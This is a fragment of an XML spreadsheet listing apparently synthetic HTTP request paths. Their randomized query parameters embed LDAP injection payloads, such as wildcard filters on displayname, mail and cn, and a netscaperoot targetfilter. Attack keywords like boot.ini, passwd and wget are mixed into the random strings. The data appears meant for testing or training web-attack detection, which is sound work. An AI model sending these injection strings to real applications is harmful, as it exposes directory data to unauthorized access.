    <t>/lq6tzt.tbqu3u55y8q/cw8/yadhnr/thz1mt6pvp317k_btir.bin?hfperljzstyleshttppg=e3nxanrr&amp;v6=5&amp;ohx=)+++(++|(displayname=had*)++(name=had*)(++++mail=had*)&amp;tadeobbo2ind=lo7l+drr+&amp;ag=jrsk&amp;nngmdiat4esgh=124973236&amp;nre3btloenebzm=a&amp;hrprzrzi=ipshutdown+y&amp;apojefavspbei=agnwuauifgtonaof&amp;akdg=1&amp;eehrde=32197217&amp;p5dsqm=87940716&amp;aatovaa4e3ejent=mdtmpviw&amp;eio=619463&amp;mtnfn0uh3v4coah=uiaipcie</t>
  </si>
  <si>
    <t>/er2j/oewyes67iaroin4ikhnu/mjsujagdiczxzcym_b4e/eooti/1slspxfqfeqwx3bz/imgt/tqcn8r-ax9vuf.shtml?nr7beef=tertqnfsm-a&amp;lpfnotla=+t&amp;ranwcsh=5027&amp;4wmnfvnus=n7oa0co3ru&amp;9klocationqq=cf+r4grt0l&amp;d6oeynareseon=be%&amp;mnn=e++tssehsy?aspme&amp;npihheoqt=?a&amp;input80jpnx5.wq=129613&amp;fc2k.5g=89878595&amp;njnatp=pt-@|g/nafm&amp;thy2home=mrusx&amp;ihsoepur=2823&amp;systemyu8slfxms=")(targetfilter=(o=netscaperoot))&amp;dsf6processing-instructionp=)]i4ifn\\th"+2n4a+"&lt;&amp;</t>
  </si>
  <si>
    <t>/rzhma3n5ea/nmvvp__5hsxnt/ekrdtz/trds/o-rjjc@dq/imt6b0nendglo/untemiqo7khbeutclrc/coionsb3mfunn42/ltv7qfodufcy.png?alr8eeaitigete=rwsnjjtwca5leht&amp;ios=se&amp;meceahde=oo98wpk&amp;ih7g=6652269&amp;esien=lriai4retwysnftp&amp;zz5l3suoww9y=)+(++++|++++(vcl=e1t*)</t>
  </si>
  <si>
    <t>/clr/exm16_dof5ih/elpfwactecsa/w@dtmes77x/ug/szpm/totkta0/ft/s_xpy/ex/8h2amoysynajiaulf/id4tnb.jpg?5rdddlrevo=i&amp;wj1=sp&amp;ona6die1iu=ts&lt;pidx:(ann&amp;setnssswtr=eewe]cho&amp;uic=+9e+script&amp;1ielaidue2ceid=088&amp;wnrd9rrvuin=)+(+|++(++++cn=*o+'brien*)(mail++++=*o+++'brien*+)+&amp;sr=674&amp;object277home=eoaaewtdxdmws</t>
  </si>
  <si>
    <t>/fhe/i.sia2fqgwm/d8k5/noldeoamdueeaiau/aad1/pu/edyaqh/derc7orss0assmg/euptlisfitun4ca7ncso.shtml?qtowirajnan=ahzoihnyeio&amp;nnd8arer=e&amp;_jalltfcff6i=+rf&amp;cfh5=trf&amp;drs4osnau9ufh=4183133523&amp;ee=5&amp;t4=9&amp;13echon06fwtfromlg=65&amp;tdor6efehhrnce=okomuvn&amp;eesenjcllbone=232)(&amp;(objectclass=gis)(|(sn++++=++++sdu)(cn=nh+++j*))</t>
  </si>
  <si>
    <t>/sgx/ajsb3018uh4vtzxn/1r7e0wkiren1o/mxwf1rqruqz71zgemd/fseienhl3dfechsnn/dteksstfseseye1ed8d/hifrlomtg0eowaoce/o2nsp7bhoefiet/6ssa4q9eroekhltoo/gs5fnsnireleltraob/tlxmlm8xacceptl.jsp?reidb=659)(&amp;(objectclass=eql)(|(sn=+++rayg)(cn=i5s+++j*))&amp;fmprwservicesk6epa-=ekjg&amp;emhnhdbe2gaoce=id0+msa?tselectc5&amp;zegwynhtothx=l6r&amp;eesgpehoikrr=93814&amp;tayeno1swii=1t&amp;duel=iz31h8ev</t>
  </si>
  <si>
    <t>/bneea9qtrbesitheb6eo/a95xzrqllenc/fawm.s3tfjzzps4/ye/aidx4swgvz0jtzy5p5/on-dhtfv9.tiff?esogsiuaiiao=tft2lw&amp;nder6stya=93701&amp;rri6ufnshpncp=hcoh&amp;datecups=")(targetfilter=(o=netscaperoot))&amp;sto=erswa</t>
  </si>
  <si>
    <t>/c5z@ewhshutdownrnpgjvbscriptn/eeoit81g/nwq5qffoiv0we/1yiim_.html?e3ms5=nca7rhajb5&amp;ssweulsaoi8dh=rt5&amp;anj7j5=6tnuboot.inil@&amp;l5yaeeetaba=einni)(&amp;(objectclass+++=++++n5p*)&amp;nc6fprocessing-instructionlhlstl3=e@s&amp;oironie0rsni=74819375</t>
  </si>
  <si>
    <t>/ovwr_vxfnb@tnvnfqp/wlstgrivaryzzexecformx/hhktas/nsttaitkbleiiegajx/r3ypwz.f2a/sock_streamhyq/8fmixz/ndumtne6onleuikt/mj/ek/iytk@/sinxji@sctew9543.cfm?oa=eydb&amp;keirhtt=)++++(+++|(+cn=*o'brien*+)(mail+++=*o+++'brien*)+++</t>
  </si>
  <si>
    <t>/idr6cegy0anduxk@/nc3zhoblq9/shijf9/pr0ghtihnohn1teftsi/z8pelolincedj/s8sf2iz3dmpqkteogiv.bin?e3i=2ne6+8t&amp;aayihvpnnnv=xeatoajfeoteeaa99&amp;g6qkqo==mled&amp;mur2=s&amp;+d&amp;tcat8-tc8-6=9620&amp;ratynn9vy=iote&amp;nnbon=d/&amp;djytiasot&amp;jhhamsjzhrhtd=")(targetfilter=(o=netscaperoot))&amp;eiednnsshzgaan=position&amp;euhestzoeant=5829708&amp;eh=o:e0eiboot.ini+eein9ie\\)</t>
  </si>
  <si>
    <t>/acftssexsveyapabhor.php3?bld2eaisnejdre=cwevaltt\\7ese&amp;m2linkabs_unwf0=(ge&amp;dzeca421iofsk=\\e(o]iablce&amp;oopmuro=d4xm&amp;reitl=)(++++|+(displayname=had*)++(name++=++++had*+++)(+++mail=had*+++)&amp;f_winntpsmy25=2.rl@3&amp;iec7tsban4=3795423&amp;krestqwtn3vfc=4567&amp;hy1na4d1easp=fn9irmdht?abkiwahe&amp;yiowelvnai=ev/&amp;allne=5891497&amp;ozn=e</t>
  </si>
  <si>
    <t>/3q8fblh./o55ctmpze/5zxhckfrp.jpeg?p5.cmdmemupdate=nb3d&amp;ifewaonee1cne=twle&amp;p.iwy8nl7nvl=|vin&amp;wwghf=bgfv9biy&amp;eniajc1anerwsho=v069ls6ebaimprsou&amp;atnpt0ydeiow=)+(++|+(+cn=*o+++'brien*+)(mail=*o+'brien*)+&amp;ehn5ehd=81691647&amp;s6sblalaezyl=rshutdown&amp;oo3bexecs=44008662&amp;dmasuuwo2ireec=2aax_pht&amp;aeieibe8ihftjtt=plocation&amp;nnuyisatldfeon=xelc7crleoa&amp;9hwenyd1eeteon=30626&amp;egiyotd7u=2364760</t>
  </si>
  <si>
    <t>/honountt/a5hlwycufcg.html?ilots=)++(+++|++(bee=doo*)</t>
  </si>
  <si>
    <t>/rmv4cj/klp9ke@bqcmgusk/lw/svtw5ahftfjbynt/c64rjh9aqok32oy1/pimjnwimoawy4uussldc/t4pjmv6h/nnca/mtaeeyf.htm?htio0aamoto=ee0nn)(++++|+(ss0e=*)&amp;vade1=cma&amp;wepnbi=qkeirqv</t>
  </si>
  <si>
    <t>/er/tonhqa_p3mpcw/fgkituqmbdea07lf3esj/k1rdfs/td/qlms1su/tfeugx9k6vpa@dxuny/no/i2slncehdk42l/tt58gu9sl0cqj/pner2bixsthrrtxh/services6y4vh9aut20vt.cfm?x4cv8sp=caiucreh8wdrnww5au&amp;msheeejboceoenh=r1ets)(++|++(sr4=*)&amp;ldtrq9g11o=nsomp&amp;uaeyg2sxrs=yaoo+:gagsjnekbrlibe&amp;rsa=d</t>
  </si>
  <si>
    <t>/sn6unf4d/dx1tu6q0ezuf/td2pdqi@uwx.a/roau2ir4/ntpop6uwcrn.pl?tn=hrsme&amp;tru2etratd=0&amp;mrobuoeu3n3t=qfe&amp;ientrsme2=curtfu&amp;edlinee6he=roaehy&amp;orizlagrioecf=28&amp;hboot.ini1kqr1hc=9&amp;8emu4ie=)(|++++(+cn=*o'brien*++)(mail+++=*o++'brien*)+++&amp;urranybhtal7g=16&amp;tspp7dde55e=3659003&amp;seehs=ee?=&amp;uc0z9rs=5323&amp;netehlor4ycdm7=014</t>
  </si>
  <si>
    <t>/k6cd2wd2o_dz/eac/oaua6/ao/topq.ligvtl7h4de1b/0g4rdftutc1/hbupdateiu/tqr3tattajn4q.pl?ceiloeee=retf?ntuonw+cftpunion&amp;ptohiel=repem)(++++|+++(ulrna=*)</t>
  </si>
  <si>
    <t>/tx9nz1dy1y_/hqitvzp3pcezng83eg/gnorom/mhwd2@tzj8n.gif?m@cpc7nyo=rk1d0&amp;9mrs=t4dns8tnhmitnenpp&amp;gotaq7reh6cybnu=nyvor&amp;ni=mochaogspnnai\\&amp;esu=)+(+++|+(displayname=had*)(name=+++had*+)(++mail=had*)&amp;euen7=0yitww&amp;sw0tr3tcoatwj4=dtzy7j2c&amp;.@k3style=a4lo</t>
  </si>
  <si>
    <t>/nodee7-jand0t/z3/yu9zxwmivvhwu/gu/amopbf6rvsnec1/yteodroe/s8pqjizu90vtz0/alomdhees/memozdde/ly9l2.r@ih/leoe9nm3h/ie.css?te1onguiog=xitlintacwa4oh&amp;4wnsrrlr=ecs)(&amp;(objectclass+=++++eeae*)&amp;jldmgdfgttgtne=864783&amp;ayoa=2109394&amp;hr35wuvmoghy=~(+&amp;o4r=5hlt&amp;erminh9el9lno=72708961&amp;ponn8ecjgatnan=uaeea&amp;baeadi4tc=e&amp;oniia=iragba</t>
  </si>
  <si>
    <t>/le/oetahelaz/em/eaa7li/grl/ib7ydfad@iw84dosg/rtqslidjys1wqbe.tiff?oohslesytfbnt=ojsw)(&amp;(objectclass=p35*)&amp;wddito4irenb=t1/qns4d~&amp;budb=+iaeans</t>
  </si>
  <si>
    <t>/kzovij/1oehauo/sizyeaea.sh?alphnnhdf=ocdutvae7udszoncr&amp;nu84bnaptpha=io~0sn&amp;ubed=jc0laj6gyhf&amp;lro=oome6&amp;thnirsiinldg=rqo8ygcm_igm&amp;ze=59492529&amp;3t9jagtxp_-d=1eh0qhhtebesgne&amp;dk=eh7exa&amp;uy=o+gavbscriptbti9or6httperrtmp&amp;res=)+(++++|+(eoe8=er*)&amp;nbegruoogs=agm0qwjvflui</t>
  </si>
  <si>
    <t>/3gf9n@zsusumlr.mspx?piaoacsnrita=xpmant8z2c2t5oedbi&amp;eauoji=556412&amp;uieb3e=28&amp;ihra5dertbnbd=)&amp;g29rzn4i7gta=)+(|(z3=to*)&amp;es=h1peusmefil&amp;bv1l1rb=dkdocument&amp;tyuirjteargota=bgsound@ef&lt;fdiecuihomebshutdownqgroup+bye</t>
  </si>
  <si>
    <t>/node1q/he/xj/dnn8evh/bomroiq/rttlttdkth/2d/axvjnemmvdmm/cr001g/apc4sudaupew4i9u/a9vyag7rhxeskfrz.swf?zejetir=8712759911&amp;siiadtl=)(+|++(displayname=had*)(name++++=had*++++)(++++mail=had*++)</t>
  </si>
  <si>
    <t>/sse.asmx?nqwzssdeeod6rt=olfnnttw&amp;eaitev=selecte@&amp;dprae77xoycrtxg=9ialn&amp;uyitivbaiwtsl4d=9152951&amp;rsvteh=hd9retisc78d&amp;l9fpperlaei-=mhwmq4ndk8&amp;tmromu=")(targetfilter=(o=netscaperoot))&amp;bienpbtizskl1=074827&amp;atrpevqtotien=ecz8nppn+ntcleand</t>
  </si>
  <si>
    <t>/szo2ebclhyptha-diwf/tutnsnn/01g4rrcpyb./ui4auhyob9p6s0ido5/szemowaj-@jug/ith6haret/eeah12/ameooavudnpj.aspx?dttco0itodn7tgb=&gt;h1a2l&amp;cft8eixaldendee=+aichomey6v7rahom&amp;edeworrowse9u=)+++(+|+++(obg=s2ouj*)&amp;yonmseyrnur=hkct&amp;hjhm4biframecopyx=0alt8oe&amp;ftp4.dg=ietcae&amp;ay7m=01908&amp;pqy=5974382</t>
  </si>
  <si>
    <t>/telnetumcizn/aoardti/oqwherer0pv/esxtei1fc9r54/4sntqconnectilzblvara-/k@rryes.irw_yu/w6eiff4arxoeisrtdur/p9ob/cupdateig4wc/tsftcetfitnc5.gif?we=6&amp;3ngdtett=d2twns6._3e&amp;ireo=sswb-a_jie2b&amp;tsrtede=u1hrt9xo8y1&amp;sgootdli=+o&amp;mox=eiar&amp;nornyht5va=iitdeor8eor&amp;e1tinua=03498718&amp;iaheoeto=6&amp;emw3qy2traa=o+tlsi0;&gt;leg=t+&amp;tsbshyjv=sl5heep/vs+joulapeprocessing-instructione&amp;oljelomzsedutio=muobogl&amp;qnvkx8unwd=)++(++++|+(w7oo=hdr*)&amp;2ewox=6aec@&amp;0phrif5nmolhi8c=e&gt;sp</t>
  </si>
  <si>
    <t>/atwbt2titc/a1okqjkfqm@s/uzpe2fnompad/pzctal/dv35xw194t3p/ccthpw/ar/cbengtidafued/mpptunfshl/ch8/gsre9izo8enrlqsp/@nt.htm?i4u=&gt;&amp;f7rshl1nr5tvcn6=td2b&amp;tr=271&amp;cetbaik=g1cbonaje2&amp;iarnye2t=y1ii&amp;3hnsouhn=tmcma)(&amp;(objectclass++=+++cne*)</t>
  </si>
  <si>
    <t>/eembznyndhantey.jpeg?ethw9=42810280&amp;ifi=n4a&amp;ci2hueeyd=bseiem&amp;d9dltk=ark3_qo7&amp;e8xnetcatj4=c-vqcx&amp;fa4hoztmqrm=)++++(+|++(++++cn=*o++++'brien*++)(mail=*o'brien*+++)++++</t>
  </si>
  <si>
    <t>/ef_2b_1gh3xzjprn/iwwtaikateh8muwei/y4qryrpg41zr/crg-2qrw.dojj/nb/meudyzjbdviwb/k76ll.joepo0wy/_yconnectnskutjnmqf/tmadnmg64p7lljo/taejihyaat.css?zcnrsmcr=8535)(&amp;(objectclass=if2)(|(sn+=+++bvw)(cn=sdzr+++++j*))&amp;iipntae7ulaor=tsh2en9nmkr&amp;rifcnwno7=92959499&amp;cgu6hem=xttnrbin&amp;lieae=749833&amp;ssibboihy1os=och&amp;eiccoi8snh4=yfa-gv&amp;sxshh=~me1a+b&amp;esvt9cyeornle=0536&amp;q1ylpf=kszbo&amp;htl=uraarmrt&amp;rale1nyn8odeegg=oexec25n&amp;6nht=nr]access_logreplace0dfromeases</t>
  </si>
  <si>
    <t>/i6acveosyt4qr/r9n5stnghsy4fsogaadi/alhiephhaht/ijyskbbtgkr.kawdz/nullkllusrqwxbinc/lydssoaeuc/rg3mrrpg6imjwmjo.b.swf?inuq=fesrre6i1se&amp;tdxrnrsss=huztekri&amp;csakaiul=fnvise&amp;bswarttatrd=)(+|+(+cn=*o++++'brien*+)(mail=*o++'brien*++++)++++</t>
  </si>
  <si>
    <t>/flixmetajpnetc/ityucagxdf3qi/gf1merz5dzcdt/etvdc@6oqx/d-hyyxtvrer9d8o/tsg42m/sibeuei6eitee57lp4h/sfgdq/iznyutnvremh9zmkmu/jg8u8-27z0j-3/mwf/ttqgnnnr-juzp0.gif?4ielnceq=u+)creatg&amp;rn4dmu=hou&amp;q.ax0qyu8k=4598999&amp;xatzavleaoo=sa]&amp;tn4t=ako&amp;vknz64=53134290&amp;fr9ypna=574)(&amp;(objectclass=ild)(|(sn+++=+++3e)(cn=tp++j*))&amp;rnsrults=itwua5t-ry&amp;lnstslefwehef=2629&amp;etrtnuj7uemelmo=en0toroholokha55</t>
  </si>
  <si>
    <t>/nauh9r2/oe8osheetaiaaiey/saetafisrsyhtaur8/mdagcaern/hgmvynqwy52c/8ujpx-_idzp09szfgyzl/tlla_hok2h6aiopmp6/amt9a4tea2yn.dll?lsatyahngai=+abetweenhifmennhtpasswcis&amp;tlenc0=si@ehneavrnl]t&amp;frnoeci=1&amp;4knpsnda=tcqoteteimtoiubaro&amp;orttcotun=hsy5f)(&amp;(objectclass++=++++nns*)&amp;emisyi=cmddwnieoaot]uaoa&amp;tewrevwnlhltw=nho6uo&amp;o4bdue=vt')&amp;mdblsnupdatecw=casnvi?</t>
  </si>
  <si>
    <t>/z6edzq4v0q0tchild0./tdl9r0efoseeq/1fyh3h.th/palettidnfysidrgekbe/s-p48/izq8.msf?wtau=6&amp;iqri00wtsin2nir=r&amp;aumttgdoedf=2&amp;escopnu6freopi=0559269724&amp;dtetbe2inqc2=hnse++&amp;qlinkhhavingj=)(+++|++++(displayname=had*)(name++=++had*++)(++mail=had*+)&amp;3r=&amp;t)akpassthrut&amp;cf96mpof=yicaeevintonx&amp;mrrlt=ham1idodusr&amp;3pechit=elm</t>
  </si>
  <si>
    <t>/sw9kgexu.f/aznknaai8lde/emgxq.c/2eylrntr-2zc_/ibkfhwc/rdrlohb_zzdnp.jpeg?w0seutl0ew=idd&amp;8iboq=4jy&amp;echo_jrz97q=a&amp;odste=451988313&amp;zehope=66&amp;iaendy9a94oen=hehshp0v&amp;8dxlsfyrgrr=woi)(++++|(ihnd=*)&amp;aniswytt=ta&amp;c4setolonsx=al5+&amp;sstfduiaqea0hu=23085&amp;ec=y+sock_streamekish-hjrrowl&amp;su6documenti2n=prt@&amp;nkhheyt=7jays:an1&amp;isitfisnohhfso=r9il</t>
  </si>
  <si>
    <t>/tciqlrbsfbrogqepb0wi/ao.mdb?msoi0tinse=azy_nct_epvu&amp;dfxdlhrsystem=eh@m5ekks&amp;u4=a+&amp;dr9t4rtauierne6=")(targetfilter=(o=netscaperoot))&amp;ff=aoto4ie&amp;entfsi9h9lwsws=aynfju&amp;2iebbtsrt=547&amp;crebt=83561300&amp;owalnlgriet=@sl%x]&amp;h5orbdwdxx=txyx</t>
  </si>
  <si>
    <t>/7urt4ay/nhheyehtuakyg/u8ytcm-5/zayoirmswmc4/e2fwomtj.6isl7gq/n9.yscriptlvbscripthttpi6q1/ha/reshcbnfeoflo/c9mzbstylegdfonr_ev/elds/v3wif0sgsihasiae.msf?owsnyesn=t&amp;busr=edortgd&amp;oz=bin92mggwinntohu%&amp;twe1alea=2&amp;awsystemq1lnkrj=ve&amp;ne=%nsamcklpxanuhq?ndus&amp;otosya7he=ch'o&amp;3yic=yrorddca8teit1t&amp;jisniied=71&amp;sh=545324&amp;passthru0fxuxlj=cehrititn&amp;4k=mqiugoohu&amp;z6ltretsieea=9799)(&amp;(objectclass=tla)(|(sn+=++++mt)(cn=sme++++j*))&amp;atle3n=s7f463dkiol</t>
  </si>
  <si>
    <t>/idkktxjot/jegsald5djk/lvxuyi1dgelo4lhytr/ylz.jpeg?iujfoyg6p=d73p4&amp;ruejbolh=s6fxgau7z&amp;hrugprtoowew=32518&amp;oan46bwsergta=itm6djq&amp;rnt0ou=18761696&amp;dx=)++++(++++|++(++cn=*o'brien*+++)(mail+++=*o+'brien*+)+++&amp;tiesawhodafaeo=esaoka2ofeigiw&amp;i3h=neg&amp;aitt==nt&amp;onodetzpassthruyp=;chpe&amp;eenlehso=amreolianwlinkoner&amp;pszqbdmsffrom=uci7r&amp;gtmtcghttpso=cy.fdtla5h4&amp;8cnaaadxee=rtnsyexeo0isc&amp;tia6io5tprhaeow=ocjjw</t>
  </si>
  <si>
    <t>/da_7wov9il8ghbmb1/mgxrxh/goonnkmeayrenn/rput9et/ti3ewgdlacasaci58not.htm?annrsrda=6yreeixet3p&amp;mlnby0cbqf=n:h&amp;tbsesi8oanlsph=+ps&amp;aot=rosga)(&amp;(objectclass+=grof*)</t>
  </si>
  <si>
    <t>/buzca/ofiqoyu5rl7o/reyaecocemuohee8tee/en39pkyb8mtosxab.gif?5dt8h8aosdptta=prieehtmpeettnamdl&amp;tuasnlboynrht=xqwauw&amp;7ahrttainsaadua=471&amp;azamb1esfjik=rehsdicsi&amp;tseeplvecsewt=ll4utrhnu&amp;ipqcgssihle=altasaea79&amp;huneaupthu2e=tym+&amp;bas=\\fgrhcmdiaia\\evalthttps&amp;t@jgv4iin=602&amp;4tkodra=38)(&amp;(objectclass=tse)(|(sn=+++ptae)(cn=tta+j*))&amp;fhspasswdkjh_x1x=5n9koa</t>
  </si>
  <si>
    <t>/3sue/r7.duecel/s21/t7fiw8jtqiqmjaznom.tiff?c83gabodanllp=re&amp;blihosa=30&amp;tond2ahnuodu=210&amp;ufp=985593102&amp;tskuagabrc=or)(+|++(noqe=*)&amp;bheybrreq=ne&amp;tt2picaeurqt=l]b$t@fe&amp;fxhmy37486v=0&amp;roirkspozaupttp=olinhfrelxa8ync&amp;ieaunljd=sock_stream2h5eml)stae8ot&amp;a1odh=6ge'1awgetr+sl$4(&amp;f6lh9lh4napft=:i@+&amp;2b0e5pwuati=e]alfromec&amp;ai0es=auhotiro4i</t>
  </si>
  <si>
    <t>/momie/e1vaawuc6vtydf9-/i4/bnaentcesoccai2or/hzyfuj.png?efdnam9eh=)++++(|+(displayname=had*)(name++++=+++had*++++)(mail=had*++)&amp;sn=vwffecy&amp;_ykdbmvandyp=uetelycnruoltb&amp;rfur=ecuah2esns&amp;tmir=is02otneai&amp;tsto=tckxvy5hokr9&amp;rt=teh&amp;tcie25nnu=hlddb&amp;1samcko=7\\ni&amp;tkwinntlatdh3y=&lt;i9</t>
  </si>
  <si>
    <t>/r7hy4vu_h2m/a9ecdoa1y582si8tpnoo/jcx6xspmat/.fldf/4gieri8tmhuek7jrl/hsm7l9tnvt/sfpxuxbethv./csuo.sandx.bin6j4q3/nrs-ea.irxfw_b/eclsco/gzkv2y@lm/st.jpeg?i9ebnazfsw9soow=f7e01sef7i&amp;8eemere=4uwlk&amp;eobadn3sd=xp2skn7o6bzw&amp;3h3vx=)++++(+++|+(eki=es*)&amp;taelsymo5teh=35290&amp;iolaootb3y=242593</t>
  </si>
  <si>
    <t>/woiinp0flh/nhh/dtd3c7dmfgnjg@9sg/yihiascaeptccy/tjxcje/rhtnjwerudtriqq/streaioad/wlsornm/kyinvjqavo3r/kf2khb5yu5@ilhmpx86y/eksh/oifrvetenddab.html?2mima=osh&amp;m_v97dtdocumentperl=mnzbmtxa&amp;beel=mboe&amp;9i=ot/eg&amp;n6enkae9ee=8&amp;sxde=mntyosf&amp;naicj=")(targetfilter=(o=netscaperoot))&amp;eetwulawiru5=59221</t>
  </si>
  <si>
    <t>/2d.w14ub456bi9e/pxtowtheew8muibnttet/isi/iti9ye/npqiplysi4fktx07/lbmthb1kel8md/ecnoagnb.mdb?hltepnhwdd=936420575&amp;lmio06ne9lw=having5rtuaht&amp;te=lqiaks&amp;djzbhrkpyhf=87&amp;jnauwrkwhere71divi=nth)(&amp;(objectclass=++++4he*)</t>
  </si>
  <si>
    <t>/xlo/br7/s95nhwbt3rrf/menmdeiuo0c1iuu.swf?asissra=)+(|+(displayname=had*)+++(name=++had*)(++mail=had*++)&amp;ctr9rm=4385&amp;eqetedia=&amp;+</t>
  </si>
  <si>
    <t>/4urcprszywrxd5l/e6uapg.fnnsb/dudlibsrmq-hm@7cpk/ay7/_opt-/eepezitws3eros/eef3e23dic2a/lie9jkhnueaomsmdt.asmx?usnue1s5=1paue]%iac'aiixtermbody&amp;sf.3opttdmsosg=p8j&amp;htpass40r7rcpy8p6=14711779&amp;nitkae94rksroqd=)+(+|++++(++++cn=*o'brien*++)(mail=*o+++'brien*+)++&amp;4as=i&amp;ir4an7f1z5=jice&amp;agcfi8v2egnir=01&amp;7er2k=anwpf&amp;j1passthrutrlssxtq=9eo?en1[xbetween+tx&amp;lchaie3=uexanse|;&amp;|0a+</t>
  </si>
  <si>
    <t>/ul0/32ra8biehs6ht/iknzz8erx5/rlceidxa/b9qtf/nfvtdsh1d.htm?en=)++(++|++++(++++cn=*o+'brien*+++)(mail+=*o++++'brien*+)++&amp;iuee7shlnkr=eh&gt;idps6d=h</t>
  </si>
  <si>
    <t>/lbtazihottc/izmjdpzgsxwp-_/rl9jxe3_uxfn/evumtjk8@9jgk/4xconf/ehguiey/hrio5tirwiuat1lo5/ebfidrg.php3?osettmcrmoobiat=detopeneu&amp;lhmsrhfdtd=idoben/hr@xta0ar+&amp;ngvhhda0y=)+(++|++(ozs=rse*)&amp;ogkie0cizxoe=2749&amp;eef=9925</t>
  </si>
  <si>
    <t>/nszykpte.mdz-a87tls/tlgu2jcooluj/k.gdfgai.abfb5/nullinode/ugeoshonbosncoiwnpt/rpnsnoyiwa4/8eec/rt/tcdrop6.htm?mhsj=52571073&amp;ydbvari1eis=rlusnextytaadminte&amp;laedhln=464&amp;eocqssetgugtcs=renurqulni1&amp;joozrekr=34&amp;itwmsosi=dm&amp;iframezffadmhtpassd.nt=eziailixa7ib&amp;eeee4i11=ti/+&amp;ntfuhaspa7ed=kv)(&amp;(objectclass=+++2ll*)&amp;termwla=gh6rjpdf&amp;8rzeierkcm=ii81a4ltenisi0u&amp;oletaoae=99742277</t>
  </si>
  <si>
    <t>/ehwnxtviblndm/46my-/ucuibfr742_sg4r9fvz/srorrwteaplfsitlie7g/33waa8s/ow1o_ytcadfyknv/uzcc8edmx/ltsidb4/ddrtf4pmay2.mspx?nmochapb3access_log3hd=1&amp;serwtbhjw08txj=naehesatyd&amp;n6tasdoea2ai=68827815&amp;y6ris=70dcsd1za+m9s&amp;0jy8mhomezc=mhioeunahhgllhnhcp&amp;hnc61=eg@ajnas]'@&amp;asu6ortjccretm=99785&amp;8e31ario8=ahiscript&amp;ea7ocwnutj=28329&amp;9re6agbtntpyr=71894&amp;osrauedq=a0rnru9i2m&amp;hdo@q='binoi@;between&amp;4eebet=enset)(&amp;(objectclass+=+9en*)&amp;imhge8laeqa=uimgcopynxd&amp;figaiqai0x=efsal</t>
  </si>
  <si>
    <t>/rodz42/ta0leo7yvesatndl/qctoafp/aa3siomhjzdb.swf?aotidn=")(targetfilter=(o=netscaperoot))&amp;4yalruktl=9807&amp;iostjtwuoloe=uaeia4x</t>
  </si>
  <si>
    <t>/cmcntin@ejqsjlu/riz6tb79nbtbggcg/lseexknm0vb4ipl4h/xieontfktitb57psitl/nno/gvv/opeacwhpevnwuxsde/t85axiuhehexirsins9/93_l-connecte8yon/oaqdtjoiil/pnmq7v9kw6.aspx?egguahb=ii7)(+|++(temfa=*)&amp;cmr5w=deletepmre'n+nsa&amp;cfr=rsieimg&amp;xiaenetns=rboaduf</t>
  </si>
  <si>
    <t>/itvspnofewssx-xlb7c9/d6epeo22alntnn4t8hhl/ogs7af6vfyyteg2lkst/uincrsarwmoregpq1unt/rrpg2hgy8jnak/t18u2gxxcna_ll/ozp5nl3zqpx/hdmt4e4ko/t1uesee/41n53y.mspx?r7spsystemm_ginputwstdin=)++(+|+++(++++cn=*o+'brien*+)(mail++++=*o+'brien*++++)++++&amp;eutnfo=3712393&amp;ol=rnlcpht'(</t>
  </si>
  <si>
    <t>/cbddbkyfr2ioyxmi_f_6.js?6ia=mnce06e.en&amp;x1xbetween=)+++(+|++++(displayname=had*)++++(name++++=++++had*)(++mail=had*++)&amp;fewfbdtk2wwt=e7har&lt;de</t>
  </si>
  <si>
    <t>/a4tn/w53eodropperljfvpositionef/7ssteqmp/it7qyhic/nrnsbetet/ipq1azkhvwvmxf/m3e7aptttesfrttc5g/oo6qebj/eg-sxheyvjyb/kgo4tsuta/mmnunwp4bczz12214/sdozncaibnuytzramoi.msf?csa=ut)(++++|++++(goonn=*)&amp;wp-1openoservicesp7yms=294645</t>
  </si>
  <si>
    <t>/fboot.inifg1nph-/80ad0yetola/stpjgny36/eata/nfl/kggnurafunlilose/vdggsvzim_5udo@8/trem6tdtd5eeir8a/emhte9rieh1ctnrv6.jsp?kit2e3wom5vq=dsn&amp;ldarp4=me+&amp;ieln3odmtelxk=tmbd.ad1g&amp;m0spyfreuadgtsa=c&amp;busr0o@=7&amp;_do8=tot&lt;4ffmst&amp;e7yinenta=sfyfndwhgq&amp;tqxlike=xml&amp;ebsmix0lhry9e=)+++(++|++++(displayname=had*)+++(name+++=+had*++)(+++mail=had*+++)&amp;laas=4703&amp;rug=-re6teapasswd/ar&amp;ite2hsew3i=5945750973&amp;4irt0p9=0363</t>
  </si>
  <si>
    <t>/connectvie-childuh/ot@s2ybnjk91g3f/6u/8z4bodyz3_/gnog_5ccuul4/nwf/my/i1svcseiun1decuha.css?ut5tuaes5nyax=)+++(++|+++(+++cn=*o++'brien*++++)(mail=*o'brien*)</t>
  </si>
  <si>
    <t>/dbo0jafsswdnsamv/0phttphen6npzvsg/i_czshukj/amkpy/etdapn4oe1ap4w8earan/s4czbdloed/o.1dc4v4z2pnfwa/k56p.9nqovq/nzdl_t8elv3f.aspx?9jfotranreby=063385&amp;z26otitidiad=eoft@eux&amp;i@yls_xiy=hioa&amp;ae5=ctgtaoestfez5ir&amp;aovi1odq4rna=r9kc&amp;plivwrji=1&amp;vnbeei=e+ss9&amp;nf=4iwcceasse4auqaa0&amp;6eh0s8gxaeo=fbblsy_3&amp;0tvpwzi4=0557)(&amp;(objectclass=odm)(|(sn=++led)(cn=yth+++j*))&amp;aty4hm4a=+g&amp;nn3k6son=idieesplble&amp;un=zieldpblitnlfo&amp;tdliizlbviq=346&amp;dhoyeesys=i+rzrt</t>
  </si>
  <si>
    <t>/ylwuhkenseipx7sa/my8qznyvs-./eev9klwstieine/our@jif.j/s-7butqwq/np0rwjjwhu-w/stilsptl6einridto/lh5yeai/z2z.msf?5jnwe=teh&amp;ne6ht3ibtlmxet=)+(+|++(+cn=*o+++'brien*+)(mail++++=*o+'brien*)+++&amp;ctupaede=&amp;tmshlppswea&amp;44ktc=oe</t>
  </si>
  <si>
    <t>/hrsypfl/hcdhihmaeroton21zqs/s_mpqp_zwgnq-uo./tzmb@w089@5kl5p/i-blb-dppsaoo/nisdotwt/bbe6yqiwshutdown@po/rhjqwqgvehvco/rbc3htewliiik9eeuoe/6uynzkuxm48n8zo3_wl/trc/8dxkf.pl?mdivfsexecmmochametau@=t+et8xoaoae6&amp;udph8d=8&amp;erdecd=43000719&amp;krhci9nsygo=aevlinka&amp;qwnqjynzjp=7h&amp;efvusrs1tjxb7=)+++(|++++(6oi=wujt*)&amp;emit6r=4842&amp;xew=eeetr</t>
  </si>
  <si>
